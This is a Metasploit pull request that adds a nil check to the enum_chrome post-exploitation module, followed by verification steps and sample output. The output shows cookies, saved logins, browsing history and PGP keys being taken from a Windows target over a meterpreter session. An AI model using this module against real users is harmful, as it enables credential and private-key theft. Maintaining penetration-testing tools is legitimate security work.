### PR TITLE
Avoid exception on missing key in prefs.

### DIFF
--- a/modules/post/windows/gather/enum_chrome.rb
+++ b/modules/post/windows/gather/enum_chrome.rb
@@ -85,13 +85,15 @@ class MetasploitModule < Msf::Post
       prefs = f.read
     end
     results = ActiveSupport::JSON.decode(prefs)
-    print_status("Extensions installed: ")
-    results['extensions']['settings'].each do |name,values|
-      if values['manifest']
-        print_status("=> #{values['manifest']['name']}")
-        if values['manifest']['name'] =~ /mailvelope/i
-          print_good("==> Found Mailvelope extension, extracting PGP keys")
-          extension_mailvelope(username, name)
+    if results['extensions']['settings']
+      print_status("Extensions installed: ")
+      results['extensions']['settings'].each do |name,values|
+        if values['manifest']
+          print_status("=> #{values['manifest']['name']}")
+          if values['manifest']['name'] =~ /mailvelope/i
+            print_good("==> Found Mailvelope extension, extracting PGP keys")
+            extension_mailvelope(username, name)
+          end
         end
       end
     end


### PR DESCRIPTION
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] Create a meterpreter session on your windows target using your favorite method for doing so
- [x] Background your meterpreter session.
- [x] Gather the Chrome user data: 
- [x] `use post/windows/gather/enum_chrome`
- [x] `set SESSION XX`
- [x] `run`
- [x] Verify you do not get an exception or stacktrace, particularly one that appears as such in the output:

```
        [*] Impersonating token: 1616
        [*] Running as user 'WINDOWS81-PB\Pearce'...
        [*] Extracting data for user 'Pearce'...
        [*] Downloaded Web Data to '/home/pbarry/.msf4/loot/20160615110310_default_10.0.2.5_chrome.raw.WebD_356473.txt'
        [*] Downloaded Cookies to '/home/pbarry/.msf4/loot/20160615110311_default_10.0.2.5_chrome.raw.Cooki_040699.txt'
        [*] Downloaded History to '/home/pbarry/.msf4/loot/20160615110311_default_10.0.2.5_chrome.raw.Histo_233154.txt'
        [*] Downloaded Login Data to '/home/pbarry/.msf4/loot/20160615110312_default_10.0.2.5_chrome.raw.Login_745319.txt'
        [-] Bookmarks not found
        [*] Downloaded Preferences to '/home/pbarry/.msf4/loot/20160615110313_default_10.0.2.5_chrome.raw.Prefe_989558.txt'
        [*] Extensions installed:
        [-] Post failed: NoMethodError undefined method `each' for nil:NilClass
        [-] Call stack:
        [-]   /home/pbarry/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:89:in `parse_prefs'
        [-]   /home/pbarry/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:140:in `block in process_files'
        [-]   /home/pbarry/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:138:in `each'
        [-]   /home/pbarry/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:138:in `process_files'
        [-]   /home/pbarry/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:329:in `block in run'
        [-]   /home/pbarry/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:326:in `each'
        [-]   /home/pbarry/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:326:in `run'
        [*] Post module execution completed
```
